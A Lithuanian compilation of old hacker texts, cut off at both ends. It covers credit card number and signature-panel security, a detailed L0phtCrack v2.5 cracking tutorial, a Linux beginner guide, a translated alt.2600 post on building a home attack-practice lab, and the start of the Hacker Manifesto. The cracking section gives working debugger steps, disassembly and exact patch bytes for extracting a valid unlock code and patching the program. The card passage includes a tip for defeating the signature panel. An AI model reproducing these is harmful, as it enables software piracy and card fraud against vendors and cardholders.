skirtingus numerius. Shie papildomi skaicziai reikalingi saugumo

sumetimais.

Tarkime, jusu Visa korteles numeris yra 4211 503 417 268. Kiekvienas

pirkinys turi buti ivestas i kompiuteri ish prekybos terminalo. Saskaitos

numeris susieja pirkini su jusu saskaita. Asmenys, ivedantys saskaitu

numerius i kompiuteri gali kartais suklysti ir ivesti pvz. 4211 503 471 268

arba 4211 703 417 268. Taigi shios trylikos skaitmenu numeracijos sistemos

privalumas yra tas, kad tikimybe, kas kitas klientas tures saskaitos numeri

atitinkanti 4211 503 471 268 arba 4211 703 417 268 labai mazha. Egzistuoja

10 trilijonu imanomu trylikos skaitmenu Visa numeriu (0000 000 000 000;

0000 000 000 001; ... 9999 999 999 999). Tik apie 65 mln ish ju yra

tikri, egzistuojantys saskaitu numeriai. Tikimybe, kad klaidingai ivestas

korteles numeris atitiks egzistuojanti numeri yra kazhkas apie 1 prie

150 000. Kitos korteliu numeracijos sistemos yra dar saugesnes. Ish

kvadrilijono imanomu penkiolikos skaitmenu American Express korteliu

numeriu tik 11 milijonu yra naudojami. Tikimybe kad atsitiktinai surinktas

numeris atitiks egzistuojanczios saskaitos numeri yra mazhdaug 1 prie

90 000 000. Imant visus 20 MasterCard numerio skaitmenu, yra kvintilijonas

(100 000 000 000 000 000 000) imanomu numeriu 65 milijonams klientu.

Galimybe atitaikyti numeri czia nevirshija vieno prie pusantro trilijono.

Be kita ko, tokia sistema suteikia galimybe ‘neakivaizdinei’ prekybai,

apmokant kreditinem kortelem. Pvz., kai TV-reklamos siulo skambinti ir

uzhsisakyti kokia nors preke telefonu, operatores, kurios priima uzhsakymus

negali matyti nei kreditines korteles, nei jos savininko parasho. Kaip jos

gali zhinoti, ar skambinantysis ishvis turi kreditine kortele?

Jie grindzhia savo pasitikejima kreditiniu korteliu numeracijos sistemos

saugumu. Jeigu kas nors skambina ir panaudoja ishgalvota numeri, shis

numeris, tikriausia, neatitiks egzistuojanczios saskaitos numerio. Ar toks

numeris egzistuoja ar ne, galima patikrinti labai greitei, pasijungus prie

kredito kompaniju kompiuteriu. Visais praktiniais tikslais, naudojant leva

kreditkes numeri, yra vienintelis budas – nuskaityti ji nuo

egzistuojanczios kredito korteles. Plastiko gabaliukas nera butinas, pakanka

numerio.

Parasho laukas

—————

Jus negaletumete ishtrinti parasho korteleje, jeigu gaunate leva

kreditke. Jeigu jus ar kas nors kitas megintumete tai padaryti, greit

isitikintumete, kad kortele tampa visishkai nebetinkama naudoti, (bent jau

jos jau negalima rodyti). Kai kurios korteles turi specialu parasho lauko

pagrindo dizaina(linijini ornamenta), kuris nusitrina, jei kas nors bando

ishtrinti parasha, paliekant balta plema. Ant kitu, bandant ishtrinti

parasha, pro pazheista parasho lauko pagrinda pasirodo zhodis ‘VOID’,

zhymintis korteles netinkamuma naudoti.

Budas apeiti shia saugumo priemone

Jeigu parasho laukas neapsaugotas linijiniu ornamentu arba sunkiai

atkartojama spalva, parasho lauka galima uzhdazhyti.

Magnetine juosta

—————-

Daugelis mano, kad magnetineje juostoje uzhkoduota daug informacijos

apie korteles savininka, arba apie saskaitos balansa. Realiai, joje

neimanoma irashyti daugiau, nei i panashaus ilgio garso kasetes juosta.

Ishtikruju magnetineje juostoje pakanka irashyti saskaitos numeri ar

kitokia identifikacijos priemone. Bet kokia kita informacija, reikalinga

pinigu pervedimui atlikti, tokia pvz. kaip saskaitos balansas, gali buti

ishtraukta ish banku kompiuteriu ir nera reikalo kodoti jos paczhioje

korteleje. Ta pati galima pasakyti del informacijos apie korteles

savininka. Be identifikacijos, magnetineje juostoje gali buti irashyta

galiojimo data, nes bankomatai kartais ‘prarija’ kortele, kai jos galiojimo

laikas pasibaiges, netgi jeigu balansas yra tvarkoj.

Informacija magnetineje juostoje galima ishtrinti palaikius virsh jos

stipru magneta.

25. L0phtCrack v2.5 krekinimas

Info:

Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)

Irankiai: SoftICE, WinDasm, UCOL Patch Maker, Betkoks šešioliktainis redaktorius

Taikinys: L0phtCrack v2.5 (www.l0pht.com/l0phtcrack)

Intro:

Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti.

Pora sakinių:

Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, WinDasm, šešioliktainį redaktorių ir asembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:

SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.

Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):

.

INIT=”CODE ON; X;”

.

EXP=c:windowssystemkernel32.dll

EXP=c:windowssystemuser32.dll

EXP=c:windowssystemgdi32.dll

.

Kombinacijos:

Ctrl+D – įeiti į SoftICE;

F5 – įšeiti iš SoftICE;

F10 – vykdyti programą po vieną eilutę;

F8 – jeigu esame ant procedūros, įeiti į ją.

Visus įrankius galima atsisiųsti iš http://ucol.home.lt/cgi-bin/ucol.pl?l_tools.

Krekinimas:

Pirmiausiai reikia nukopijuoti failą l0phtcrack.exe į kokią saugią vietą (to reikės vėliau). Dabar paleidžiame pačią programą (L0phtCrack), spaudžiame mygtuką „Register” ir lauke „Unlock code:” įvedame betką ir žiūrime į iššokusią žinutę: “You have entered an invalid code. Please try again”. Dabar įeiname į disasemblerį (WinDasm). Atidarome failą l0phtcrack.exe (jis yra krekinamos programos direktorijoje). Vykdome paiešką pagal matytą žinutę: “You have entered an invalid code”, t.y. einame į WinDasm meniu sklitį „Search” ir vykdome komandą „Find Text”. Lauke „Find what:” ir įvedame tą žinutę. WinDasm lange atsiduriame čia:

.

:0040635F 52 push edx

:00406360 50 push eax

:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas

:00406366 83C408 add esp, 00000008

:00406369 85C0 test eax, eax

:0040636B 7435 je 004063A2 <- ar mūsų unlock geras/blogas

:0040636D 6A00 push 00000000

:0040636F 6A00 push 00000000

* Possible StringData Ref from Data Obj ->”You have entered an invalid code. “

->”Please try again.” <- mūsų žinutė

:00406371 6830354800 push 00483530

:00406376 E8F0020500 call 0045666B

:0040637B 56 push esi

:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]

:00406383 E812EE0300 call 0044519A

:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]

:0040638F E88ED50300 call 00443922

:00406394 83F801 cmp eax, 00000001

:00406397 0F846EFFFFFF je 0040630B

.

Dabar programą L0phtCrack užkrausime per SoftICE loaderį (loader32.exe). Užkrauname loaderį. Atidarome failą l0phtcrack.exe. Paskui užkrauname programą spausdami mygtuką „LOAD” arba eidami į programos meniu „MODULE/LOAD”. Aktyvuojasi SoftICE, tada spaudžiame F8 (vieną sykį). Dabar rašome: Bpx 40635f (tai mes matėme disasembleryje). Bpx yra viena iš SoftICE komandų, o skaičius 40635f yra vykdomos programos eilutės vieta. Taigi įrašyta eilutė lieps SoftICE sustabdyti programos veikimą ties ta eilute. Suprantat link kur suku? Dabar išeiname iš SoftICE (F5). Pasileidžia L0phtCrack. Vėl einame į programos užregistravimo langą. Lauke „Unlock code:” surenkame sux.

Spaudžiame OK. Aktyvuojasi SoftICE. Matome labai panašų vaizdą kaip ir

Disasembleryje (WinDasm):

.

:0040635F 52 push edx

:00406360 50 push eax

:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas

:00406366 83C408 add esp, 00000008

:00406369 85C0 test eax, eax

:0040636B 7435 jz 004063A2 <- geras/blogas unlock

:0040636D 6A00 push 00000000

:0040636F 6A00 push 00000000

:00406371 6830354800 push 00483530

:00406376 E8F0020500 call 0045666B

:0040637B 56 push esi

:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]

:00406383 E812EE0300 call 0044519A

:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]

:0040638F E88ED50300 call 00443922

:00406394 83F801 cmp eax, 00000001

:00406397 0F846EFFFFFF jz 0040630B

.

Rašome: d edx (Hmm kažkas yra. Užsirašome tai savo lape)

d eax (Mūsų įvestas “sux” (be kabučių))

Komanda d parodo registro (EAX, EDX.)turinį. Sintaksė yra tokia: d registras.

Uždraudžiame visų breakpointų (Bpx) naudojimą, t.y. parašome komandą BD *.

Išeiname iš SoftICE (F5). Dabar teksto lauke „Unlock code:” parašome tai ką

buvome užsirašę. Pas mane buvo 6be3b311. Spaudžiame OK. Bingo! Pasirodo žinutė: “You have successfully registered L0phtCrack 2.5″. Tai reiškia, kad jūs sėkmingai užregistravote „L0phtCrack v2.5″. Bet ne visi turi SoftICE ir Disassembler, todėl jūs turite padaryti patchą. Tai bus programa kuri žinutės pavidalu parodo unlock kodą. Bet jūs dabar jau užregistravote programą, todėl eikite į windows „Start” meniu ir vykdykite komnadą „Run”, tada surinkite „regedit” (be kabučių). Atsiduriame programoje, kuri redaguoja windowz registrą. Einame į HKEY_CURRENT_USERSOFTWAREL0phtL0phtCrack ir ištriname „Registration” stringą. Dabar jau galima daryti patchą.

Patcho darymas:

Einame į SoftICE(Ctrl+D). Surenkame komandą: Bpx MessageBoxA. Apie „Bpx” kalbėjau anksčiau, o apie „MessageBoxA” pakalbėsiu dabar. Tai yra standartinė API funkciją. Taigi mes su komanda „Bpx MessageBoxA” sustabdysime programą tada, kai ji vykdys šitą funkciją. Funkcija „MessageBoxA” išmeta žinutę. Dabar kur “Unlock code:” įvedame bet ką ir spaudžiame OK. Aktyvuojasi SoftICE. Mes esame procedūroje „MessageBoxA”, kad išeitume iš jos mes turime spausti 8 sykius F10, kai atsiranda žinutė OK ir dar 2 sykius F10 arba vieną sykį F11 ir OK (nežinau

kas jums patinka labiau J). Mes išėjome iš procedūros. Štai ką matome:

.

:0045662E 53 Push EBX

:0045662F 57 Push EDI

:00456630 FF7508 Push DWORD PTR [EBP+08]

:00456633 FF75F4 Push DWORD PTR [EBP-0C]

:00456636 FF150014D100 Call [User32!MessageBoxA]

.

Parašome: Bpx 45662e (tai bus reikalinga vėliau).

Dabar turime ieškoti seniau surasto unlock kodo (pas mane buvo 6be3b311).

Rašome: d eax (Fuck!)

d edx (Fuck!)

d ebi (Fuck!)

d ebp (Štai jis čia!)

Radome, kad jis registre EBP, bet jis dar ne jo pradžioje, taigi rašome

d ebp+54 ir jis jau pradžioje. Jis randasi vietoje F7FBE4 (šešioliktainis

kodas). Patchas vietoj žinutes: “You have entered an invalid code. Please try

again”, parodys unlock kodą. Taigi mes turime tą žinutę perdirbti. Procedūra MessageBoxA susideda iš šių dalių:

Push 00

Push <žinutės lango pavadinimas>

Push <žinutė>

Push 00

Call MessageBoxA

Mes jau žinome, kad unlock kodas yra vietoje F7FBE4 (šešioliktainis kodas), bet mums dar reikia žinutės lango pavadinimo. Mes padarysime taip, uždarome programą L0phtCrack. Failą l0phtcrack.exe atsidarome su šešioliktainiu redaktoriumi ir ieškome pagal frazę: “You have entered an invalid code” (be kabučių). Atsirandame vietoje 83530 (šešioliktainis kodas). Šita žinutė pakeičiame žinute: “Unlock kodas yra:” (be kabučių) + 00 (tai parodo, kad žinutė užsibaigia toje vietoje). Visas šešioliktainis kodas atrodys taip: 55 6E 6C 6F 63 6B 20 6B 6F 64 61 73 20 79 72 61 3A 00. Neužmirškite išsaugoti failą! SoftICE žinutės vieta yra kitur. Kyla klausimas kur? Mes tiesiog turime prie 400000 pridėti 83530 (vieta faile) ir gausime 483530 (šešioliktainis kodas). Tai ir yra vieta SoftICE. Štai turime ir lango pavadinimą ir žinutę. Tai atrodo taip:

Push 00

Push 483530

Push F7FBE4

Push 00

Call MessageBoxA

Dar atsimenate anksčiau uždėta breakpointą Bpx 45662e? Štai čia mes ir įdėsime šitą žinutę. Vėl einame į L0pthCrack. Renkame kokį nors blogą unlocką! Aktyvuojasi SoftICE ties 45662e. Užsirašome apie aštuonis šešioliktainius kodus: 53 57 FF 75 08 FF 75 F4 Jie bus pažymėti ^^^^^^^^^^ (kad jums būtų aiškiau). Jie bus reikalingi ieškant vietos su šešioliktainiu redaktoriumi:

.

:0045662E 53 Push EBX

__________^^

:0045662F 57 Push EDI

__________^^

:00456630 FF7508 Push DWORD PTR [EBP+08]

__________^^^^^^

:00456633 FF75F4 Push DWORD PTR [EBP-0C]

__________^^^^^^

:00456636 FF150014D100 Call [User32!MessageBoxA]

.

Dabar parašome komandą a (assembler). Spaudžiame klavišą enter ir parašome šias eilutes:

Push 00

Push 483530

Push F7FBE4

Push 00

Call MessageBoxA

Nop

Baigia rašyti, spaudžiame klavišą „Escape”! Komanda nop reikalinga, kadangi sugadinome vieną komandą, nes naujai žinutei prireikė daugiau baitų. Komanda buvo nepilna, todėl mes ją panaikinonome (NOP reiškia nieką. Ji tiesiog nevykdoma). Jeigu šito būtume nepadarę būtume sugadinę programą ir ji butų neveikusi!

Pakeistas kodas su SoftICE:

:0045662E 6A00 Push 00

:00456630 6830354800 Push 483530

:00456635 68E4FBF700 Push F7FBE4

:0045663A 6A00 Push 00

:0045663C E898D2B0BF90 Call USER32!MessageBoxA

:00456641 90 Nop

Pabaiga:

Dabar jau užsirašome visus pakeistus eilučių šešioliktainius kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Išeiname iš SoftICE ir L0phtCrack. Einame į šešioliktainį redaktorių. Faile ieškome pagal tuos aštuonis anksčiau užsirašytus kodus: 53 57 FF 75 08 FF 75 F4 ir nuo tos vietos pakeičiame į pakeistus kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Tai ir yra mūsų patchas. Dabar paleidžiame L0phtCrack ir einame surinkti unlock. Spaudžiame OK ir matome žinutę: „Unlock kodas yra:” XXXXXXXX (X yra bet koks simbolis). Spaudžiame OK ir renkame matytą kodą. Vėl atsiranda ta pati žinutė. Paspaudžiame OK ir mes jau užsiregistravę J. Taigi dabar mes turime nupachintą l0phtcrack.exe failą, bet toks failas yra didelis ir tik pas jus, todėl mes turime padaryti programa, kuri automatiškai, tą EXE failą nupatchintų. Tam ir reikalinga pradžioje minima programa „UCOL Patch Maker”. Ar dar atsimenate, kad iš pat pradžių l0phtcrack.exe nukopijavote į saugią vietą? Taigi jūs turite ogiginalų ir nupatchintą failus, o ką toliau reikia daryti žiūrekite į programos „UCOL Patch Maker” aprašymą!

26. Linux tutorialas naujokams

1. Ka daryti jei uzmirsau r00t passworda?

2. Ismok parasyti shell scriptus

1. Ka daryti jei uzmirsau r00t passworda?

Karta kol buvau didelis Linux newbie atsitiko vienas dalykas:

uzmirsau r00t passworda.

O kitaip gauti r00t teisiu nejo/nemokejau, tad teko perinstalioti visa linux.

Kad ir jums nereiktu del to vargti papasakosiu, kaip gauti r00t teises

kompiuteryje:

Ijungus kompiuteri islenda lilo raginimas pasirinti OS.

Jus iveskite linux labeli ir po tarpo parasykite raide ‘S’.

Tada linuxsas krausis single mode rezimu, o uzsikroves duos jums shell`a

su r00t teisemis.

Tada galesite pakeisti slaptazodi su ‘passwd’ komanda.

2. Ismok parasyti shell scriptus

Kartais schell skriptai arba aplinkos scenarijai sutrumpina jusu

darbo laika. Jie gali vykdyti tam tikra komandu seka, t.y. automatizuoti

tavo darba.

Kaip rasomi sie skriptai?

Pirmoje eiluteje rasomas ‘#!’ ir pilnas shell interpretatoriaus pavadinimas

t.y. pavadinimas su keliu. Pvz. #!/bin/bash

po to rasomos komandos kurias alikines scriptas.

PVZ. Nr. 1:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#Sis skriptas demonstruoja kaip prieiti prie skripto argumentu

#Suzinoti savo uid ir username

#echo -spausdina kintamaji, eilute i STDOUT

echo “Skripto pavadinimas:” $0

echo “Pirmas argumentas :” $1

echo “Antras argumentas :” $2

user=`id -un`;

#ivykdo id -un ir isvesti perduoda kintamajam $user

uid=`id -u`;

echo “Username: ” $user

echo “uid: ” $uid

###### End Of Script Nr. 1 #########

PVZ. Nr. 2:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#Skriptas demonstruoja salygini sakini if

if [ -d /etc/httpd ] # -d tikrina ar failas yra katalogas

then

echo “tu turi instaliaves apache ar kita www serveri”

else

echo “gali buti, kad jus neturite jokio www serverio”

fi # kas sake kad programuotojai be humoro jausmo

###### End Of Script Nr. 2 #########

PVZ. Nr. 3:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#demonstruoja cikla while

while read Line; #skaito is STDOUT eilute

do echo $Line; #ja spausdina

done

#skriptas dirba panasiai kaip komanda cat

###### End Of Script Nr. 3 #########

PVZ. Nr. 4:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#demonstruoja kaip valdyti telnet ar pan.

telnet host 21 << EOF #konektinas su host kompu per 21 porta

qoute user FTP #siuncia useri

qoute pass email@email.dom #pasworda

MKDIR /same/dir #kuria dorektorija

qoute quit #atsisveikina su ftpd ir baigia darba

EOF

###### End Of Script Nr. 4 #########

27. Laikinas LINUX tinklas namie

From harlequin@fnord.org.uk Tue Jun 20 12:25:18 2000

Newsgroups: alt.2600,alt.2600.hackerz,alt.hacker,alt.hacking

Subject: HowTo: Makeshift Linux Network @ Home ..

From: Harlequin

Date: Tue, 20 Jun 2000 10:25:18 GMT

[Nuo VisiGoth:

1.Šita žinutė buvo perdyota Quinny 12.30.98 neribotam laikui.

2.Šitą žinutė paskelbė Osiris prieš kurį laiką (galbūt prieš pusantrų metų???) ir nuo to laiko jos daug kas ieškojo, bet niekas daugiau jos nepaskelbė, net pats Osiris, tad aš radau laiko paskelbti ją iš naujo kiekvienamm, kuris jaučia, kad jos reikia, nes aš manau, kad tai yra -labai- gera žinutė ir ji -turi- būti perskaityta kiaurai išilgai.]

%%%%

%%%%

1. Gauk Linux arba FreeBSD ASAP

2.Įsigyk vieną arba daugiau knygų, parašytų Spaffordo, Bellovino, Cheswicko,

Rubino arba Ranumo.

3.Gauk tiek Camelio, tiek Llamos knygas apie Perl

4.Gauk ORA knygą apie TCP/IP

5.Nusipirk keletą senų kompų (386/486) ir instaliuok tinklo plokštes. Apsiginklavęs šitais daikčiukais sukonstruok mažą UNIX tinklą savo namuose (arba garaže). Jei pasirinksi LINUX, perskaityk visus HOWTO, ypatingai tinklų HOWTO. Sukurk bent 5 vartotojų akauntus, leisdamas bent jau šelo priėjimą iš kiekvieno akaunto kiekviename kompe. Kai viskas bus sukonfigūruota (tinklas yra ir veikia), pabandyk (kaip skirtingas varotojas) įsilaužti į vieną ar kelis kompus tinkle. (Tu turėtum idealiai atakuoti įvairius servisus, ne tik kokį nors vieną.)

Taipogi: parsisiųsk SAFEsuite demo, seną ISS arba SATAN. Leisk šitas utėles prieš savo sistemą ir perskaityk tutorialus, kurie yra pridėti prie šitų utėlių dokumentacijos.

Toliau, gauk visus įrankius iš šito URL:

http://www.giga.or.at/pub/hacker/unix

Išmok kiekvieną iš jų naudoti. Toliau, gauk AUSCERT UNIX saugumo sąrašą iš:

ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist

Toliau, gauk UNIX saugumo sąrašą iš:

http://stimpy.cac.washington.edu/~dittrich/R870/security-checklist.html

Toliau, gauk Site Security Handbook (RFC 1244) iš:

http://stimpy.cac.washington.edu/~dittrich/R870/rfc1244.txt

Toliau, gauk šitą dokumentą iš SRI:

http://stimpy.cac.washington.edu/~dittrich/R870/SRI-Whitepaper.ps

Po to, kai perskatysi ir suprasi visą aukščiau išdėstytą dokumentaciją (ir išbandysi kai kuriuos arba visus minimus įrankius, perskaityk šituos dokumentus:

Intrusion Detection Checklist:

ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist

Dan Farmer’s Survey on Various Hosts:

http://www.trouble.org/survey/

Improving the Security of Your Site by Breaking Into it:

http://www.trouble.org/security/admin-guide-to-cracking.html

Visą popierizmą šitam saite, bet ypač Nancy Cook ir jos partnerio darbą:

http://www.trouble.org/security/auditing_course/

Murphy’s law and computer security by Wietse Venema:

http://www.trouble.org/security/murphy.html

Po to kai absorbuosi ir šią informaciją, ieškok šitų popierių:

CIAC-2308_Securing_Internet_Information_Servers.pdf:

http://ciac.llnl.gov/ciac/documents/CIAC-

2308_Securing_Internet_Information_Servers.pdf

Securing X Windows:

http://ciac.llnl.gov/ciac/documents/CIAC-2316_Securing_X_Windows.pdf

How to Detect an Intrusion:

http://ciac.llnl.gov/ciac/documents/CIAC-

2305_UNIX_Incident_Guide_How_to_Detect_an_Intrusion.pdf

Galiausiai, eik čia ir studijuok kiekvieną skylę, minimą BUGTRAQ archyve:

http://www.geek-girl.com/bugtraq/search.html

Kiti tau labai padėsiantys dalykai:

1.Užsiprenumeruok visas žinutes apie UNIX saugumą, pvz.BUGTRAQ,

CIAC, CERT ir t.t.

2.Iš šitų sąrašų susidaryk žinomų saugumo ekspertų (pvz.Farmerio, Venemos, Spaffordo,

Ranumo ir kitų) emailų adresų duomenų bazę.

3.Šniukštinėk Internete bet kokių jų emailų apraiškų – sąrašuose, diskusijų grupėse ar tiesiog webe. (Dėmesio! Nebandyk nervinti šitų vaikinų, tiesiog perskaityk jų mintis ir idėjas, absorbuok jas ir judėk toliau).

4.Kai tu susidursi su exploitų kodu (o tu būtinai susidursi), paminėtu sąrašuose, sukompiluok ir įvykdyk jį. Užsirašyk rezultatus. (Viena gera priežastis instaliuoti LINUX ar FreeBSD: visi kompiliatoriai yra nemokami ir per pilną instaliaciją jau gerai sukonfigūruoti).

5.Pabandyk praleisti bent po valandą į dieną studijuodamas soketų programavimą.

6.Nueik į naudotų knygų knygyną ir nusipirk kiekvieną knygą apie sistemų administravimą. Bent jaunusipirk knygas, nukainuotas labai stipriai. Kuo pigesnės, tuo geriau.

7.Nežvenk, nes šitų kalbų pradmenys tikrai daug padės:

A. PERL

B. AWK/GAWK/NAWK

C. SED

D. Expect

Taipogi pagelbėtų lentelė, kurioje būtų skirtumai tarp panašias ar identiškas užduotis, atliktas sh/bash/csh. Be to, jums turėtų būti įdomu paieškoti skirtumų tarp skirtingų UNIX versijų. Verta nusipirkti senų AIX, HP-UX, Unicos, IRIX, Data General, SunOS, Solaris, XENIX, SYS V ir t.t. instrukcijų. Žemiau esantis knygų sąrašas taipogi galėtų tau padėti. (Jos surašytos abėcėlės tvarka, ne pagal patikimą. Asmeniškai, aš rinkčiausi knygas, minėtas aukščiau.)

Building Internet Firewalls

D. Brent Chapman, Elizabeth D. Zwicky (1995)ISBN: 1565921240

Commonsense Computer Security: Your Practical Guide to

InformationProtection

Martin R. Smith (1994)ISBN: 0077078055

Computer Crime: A Crimefighter’s Handbook

David J. Icove, David, Seger, Karl Icove, Karl A. Seger, Vonstorch

(1995)ISBN: 1565920864

Computer Security

John M. Carroll

(1996)ISBN: 0750696001

Computer Security Basics

Deborah Russell, G.T. Gangemi

(1991)ISBN: 0937175714

Computer Security Handbook

Arthur E. Hutt, Seymour Bosworth, Douglas B. Hoyt

(1995)ISBN: 0471118540

Firewalls and Internet Security: Repelling the Wily Hacker

William R. Cheswick, Steven M. Bellovin

(1994)ISBN: 0201633574

Fundamentals of Computer Security Technology

Edward G. Amoroso

(1994)ISBN: 0131089293

Hacker Proof: The Ultimate Guide to Network Security

Lars Klander, Edward J. Renehan

(1997)ISBN: 188413355X

Halting the Hacker: A Practical Guide to Computer Security

Donald L. Pipkin

(1997)ISBN: 013243718X

Information Warfare : Chaos on the Electronic Superhighway

Winn Schwartau (1996)ISBN: 1560251328

Internet Firewalls and Network Security

Chris Hare, Karanjit S. Siyan

(1996)ISBN: 1562056328

Internet Firewalls and Network Security

Karanjit, Ph.D. Siyan, Chris Hare

(1996)ISBN: 1562054376

Internet Security: Professional Reference

Derek Atkins, Tom Sheldon, Tim Petru, Joel Snyder

(1997)ISBN: 156205760X

Maximum Security: A Hacker’s Guide to Protecting Your Internet Site and

Network

Anonymous (1997)ISBN: 1575212684

Personal Computer SecurityEdward Tiley

(1996)ISBN: 1568848145

Practical Unix and Internet Security

Simson Garfinkel, Gene Spafford

(1996)ISBN: 1565921488

Protecting Your Web Site With Firewalls

Marcus Goncalves, Vinicius A. Goncalves

(1997)ISBN: 0136282075

Protection and Security on the Information Superhighway

Frederick B. Cohen

(1995)ISBN: 0471113891

Secrets of a Super HackerKnightmare, the Knightmare

(1994)ISBN: 1559501065

Security in ComputingCharles P. Pfleeger

(1996)ISBN: 0133374866

Web Commerce Cookbook

Gordon McComb

(1997)ISBN: 0471196630

Web Security Sourcebook

Avi Rubin, Daniel Geer, Marcus J. Ranum, Aviel D. Rubin, Dan Geer

(1997)ISBN: 047118148X

Web Security & Commerce (Nutshell Handbook)

Simson Garfinkel, Gene Spafford

(1997)ISBN: 1565922697

http://www.amazon.com/exec/obidos/ISBN=1565922697/t/0560-5831826-082656

Access Control and Personal Identification Systems

Dan M. Bowers

(1988)ISBN: 0409900834

Internet Security SecretsJohn R. Vacca.

(1996)ISBN: 1-56884-457-3

Network and Internetwork Security: Principles and Practice.

William Stallings.

(1995)ISBN: 0-02-415483-0

Network Security: How to Plan for It and Achieve It.

Richard H. Baker.

(1994)ISBN: 0-07-005141-0

UNIX Security for the Organization.

R. Bringle Bryant.

(1994)ISBN: 0-672-30571-2

UNIX Security: A Practical Tutorial.

N. Derek Arnold.

ISBN: 0-07-002560-6 (1993)

UNIX System Security: How to Protect Your Data and Prevent Intruders.

Rick Farrow.

(1991)ISBN: 0-201-57030-0

UNIX System Security Essentials.

Christoph Braun and Siemens Nixdorf.

(1995)ISBN: 0-201-42775-3

UNIX System Security.

David A. Curry.

(1992)ISBN: 0-201-56327-4

UNIX Unleashed. 1994

Susan Peppard, Pete Holsberg, James Armstrong Jr., Salim Douba, S.Lee

Henry, Ron Rose, Richard Rummel, Scott Parker, Ann Marshall, Ron

Dippold, Chris Negus, John Valley, Jeff Smith, Dave Taylor, Sydney

Weinstein and David Till

ISBN: 0-672-30402-3.

Galiausiai tau prireiks gerų įrankių eksperimentavimui. Juos rasi čia:

http://ciac.llnl.gov/ciac/SecurityTools.html

Pradžiai tau to turėtų užtekti. Tau nebūtina viską išmokti per vieną kartą.Be abejo, firma, siūlanti tau darbą, nesitiki neįmanomo. Visgi UNIX saugumas yra besivystanti ir sudėtinga sritis. Tu neįvaldysi jos per vieną kartą. Idėja tokia: išsiaisškink senas problemas, kad kai išlįs naujos, tu žinosi jų pagrindus ir kilmę.

Pagrindinė priežastis, dėl kurios vertėtų kurti tinklą savo garaže, yra ta, kad tu turėsi šansą viską suknisti be didesnių pasekmių. Be to, tu simuliuosi mikrotinklą, galėsi žiūrėti logus ir atsakymus tiek iš atakuotojo, tiek iš aukos pusės. Tai yra labai vertinga, nes tai padės tau pasiruošti staigiai atpažinti problemą vien tik peržiūrėjus logus. Svarbiausios sritys, kuriose tau reikėtų pasikaustyti:

1. NFS

2. R servisai

3. Slaptažodžiai – aktyvūs slaptažodžių tikrintojai, bendros žinios apie DES, krekinima ir t.t.

4. Spūfinimas (spoofing)

5. Maršrutizavimas (routing)

6. Ugnies sienos (firewallai)

7. CGI (jeigu web serveriai yra integruota to tinklo architektūros dalis).

Rekomenduotina gauti TIS Firewall Toolkitą kai tik būsi pasirengęs. (Nors aš manau, kad firma, kuri tave samdys, labiau domėsis vietiniu saugumu negu nuotolinėmis problemomis. Šiaip ar taip, tai padaryti verta).

Išvertė Winter Wolf (c) Y2K

28. HACKERIO MANIFESTAS

Shiandien jie sueme dar viena. Tai – visuose laikrashciuose.

“Kompiuterinis nusikaltimas, Areshtuotas tineidzheris”, “Suimtas

hackeris isibroves i banka” .Prakeikti vaikiai. Visi jie vienodi.

Bet ar jus, su savo trydalia psichologija ir 1950tuju technosmegenim,

bandete kada nors pazhvelgti hackeriui uzh akiu? Ar norejote zhinoti,

kodel jis yra toks koks yra, kokios jegos ji suformavo?

Ash hackeris, ieikit i mano pasauli. Shis pasaulis prasideda

mokykloj. Ash gudresnis nei kiti, o tai, ko mus moko man jau

ikyrejo. Prakeitas nenaudelis. Visi jie vienodi. Ash vyresniese

klasese, klausydamas kai mokytojas penkiolikta karta aishkina apie

trupmenos prastinima. Ash suprantu tai. “Ne, ponas Smitai, ash

nerodysiu savo darbo, ash padariau tai mintinai.” Prakeiktas

vaikis. Tikriausia nusirashe. Visi jie vienodi.

Shiandien ash padariau atradima. Ash atradau kompiuteri. Pala, pala.

tai yra geras! Jis daro tai, ko ash ish jo noriu. Jeigu jis suklysta,

tai tik del to, kad ash kazhka sumaishiau. Ne del to, kad jis manes

nemegsta. ar bijo manes. ar mano kad ash gudri subine.

Ar nemegsta mokyti ir neturetu buti cia.

Prakeiktas vaikis. Viska, ka jis daro – tik zhaidimus zhaidzhia.

Visi jie vienodi.

Ir shtai tai atsitinka. Durys i pasauli atsiveria. Elektroninis

impulsas skuba telefono linijom, kaip heroinas narkomano venomis.

Ash pagaliau radau prieglauda nuo kasdieninio neishmanelishkumo,

ash atradau BBS’a. “Shtai ir yra tai. tai kur ash priklausau..”

Ash pazhistu cia kiekviena. netgi jei ash niekad nebuvau ju

sutikes. niekad su jais nekalbejau ir galbut niekad daugiau apie

juos neishgirsiu. Ash pazhistu jus visus..

Prakeiktas vaikis. Vel uzhima telefono linija. Visi jie vienodi.

Taip, subingalvi, visi mes vienodi. Mokykloje mus ish shaukshtelio

maitino vaikishku pienu, kai buvome ishalke gero bifshtekso.

tie mesos kasneliai, kuriuos jus leidote mums praryti buvo sukramtyti

ir beskoniai. Mes buvom priklausomi nuo sadistu ir ignoruojami

